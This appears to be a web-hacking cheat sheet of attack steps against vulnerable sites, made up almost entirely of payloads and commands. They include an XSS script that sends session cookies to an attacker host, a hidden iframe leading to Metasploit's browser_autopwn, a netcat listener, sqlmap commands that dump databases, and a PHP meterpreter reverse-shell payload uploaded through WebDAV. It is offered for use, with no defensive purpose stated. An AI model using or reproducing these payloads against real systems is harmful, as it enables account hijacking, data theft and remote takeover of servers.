WEB HACKING

  • All in on web tool:- http://yehg.net/lab/pr0js/misc/wsa.php?q
  • Via XSS:-
    • Exploiting the browser:-
      • setup metasploit auxiliary/server/browser_autopwn to listen for connection
      • post an IFrame tag on vulnerable site: <iframe SRC="http://ATTACKERIP/URIPATH" height = "0" width ="0">
    • Stealing Session cookies:-
      • setup a netcat listener: nc -lvp80
      • Steal session cookies with the following: <script> new Image().src="http://ATTACKERIP/bogus.php?output="+document.cookie; </script> 
    •  Bypassing Filters:- 


    • Via SQL Injection:-
      • Via GET
      • show databases: ./sqlmap -u http://www.example.com/index.php?id=1 --dbs
      • show tables: ./sqlmap -u http://www.example.com/index.php?id=1 -D <database> --tables
      • show data: ./sqlmap -u http://www.example.com/index.php?id=1 --D <database_name> -T <table_name> --dump
      • Via POST
      • show databases: ./sqlmap -u http://www.example.com/logon.asp --data "user=&pass=&submit=" --dbs
      • Via WEBDAV:-
        • Download and run ryan linn's webdav test from here
        • create a payload in an allowed format ie php: msfpayload php/meterpreter/reverse_tcp LHOST=ATTACKERIP R | msfencode -o meterpreter.php
        • start a metasploit reverse handler
        • upload the malicious payload to the target server via ftp,ssh,php,webdav (dave),rfi etc.
        • browse to the file http://target/meterpreter.php